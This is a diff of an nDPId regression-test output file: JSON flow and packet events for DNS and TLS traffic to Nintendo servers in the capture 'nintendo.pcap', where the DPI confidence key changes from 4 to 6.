-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} @@ -56,79 +56,79 @@ 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1500731340946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1500731340946,"pkt":"AA6OGXEMfLuKifuECABFAABcEY4AAEARLg7AqAxyI55KPdprgjcASL\/4MquYZAEBAADlTwAACP0AEAAAAAAAZU1IBAAAAwAAAABOQVRUZXN0SWRfRHVtbXkAdr5X4NIRIiw3Gy5kQ0UkeA=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1500731340951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340951,"pkt":"AA6OGXEMfLuKifuECABFAABOEY8AAEARz0zAqAxywKgMASfIADUAOkdJMLcBAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1500731340951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340951,"pkt":"fLuKifuEAA6OGXEMCABFAABON9pAAEARaQHAqAwBwKgMcgA1J8gAOsbIMLeBgAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1500731340956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340956,"pkt":"AA6OGXEMfLuKifuECABFAABOEZAAAEARz0vAqAxywKgMASfIADUAOpTc4z4BAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAABAAE="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731340981,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00801{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1500731340981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":298,"pkt_l4_len":264,"thread_ts_msec":1500731340981,"pkt":"AA6OGXEMfLuKifuECABFAAEcEZMAAEARmWjAqAxyNArNsdprhicBCL5GMquYZAEAAADlcwAACAAA0AAAAAAAZU1IgACGJwAAAAAPAPz\/AL\/\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9lPi1doyYlmiR\/kIBcOYNG3f6ClDHLwoaKdMh+FYL2YCHItfujH2Z4qGo8CMfrSTput8A2wWQpgkAxBIJe0WvlOjtOpz1+6kpnOg7dok0TGK81\/aeKZUUCJvuan8vMhErLm0XKEN1cWoDxH\/OLKVz5pN4b+BSPCYy59gluv93Pq8HtsFMIvC\/lWp43XhLEF2IUu226gZ0swWlxHUEiaoKOkMwyqhQOw2nawlxv1+4u7w=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1500731341194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1500731341194,"pkt":"AA6OGXEMfLuKifuECABFAABgEZUAAEARzzTAqAxywKgMAcdbADUATDXVYWkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1500731341194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731341194,"pkt":"fLuKifuEAA6OGXEMCABFAAELN\/tAAEARaCPAqAwBwKgMcgA1x1sA9yl7YWmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAPAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAALQAENsAbCMBQAAEAAQAAAC0ABDbAG2jAUAABAAEAAAAtAAQ2wBuuwFAAAQABAAAALQAENsAbSsBQAAEAAQAAAC0ABDbAG1HAUAABAAEAAAAtAAQ2wBsnwFAAAQABAAAALQAENsAbxMBQAAEAAQAAAC0ABDbAG9k="} -00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} +00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 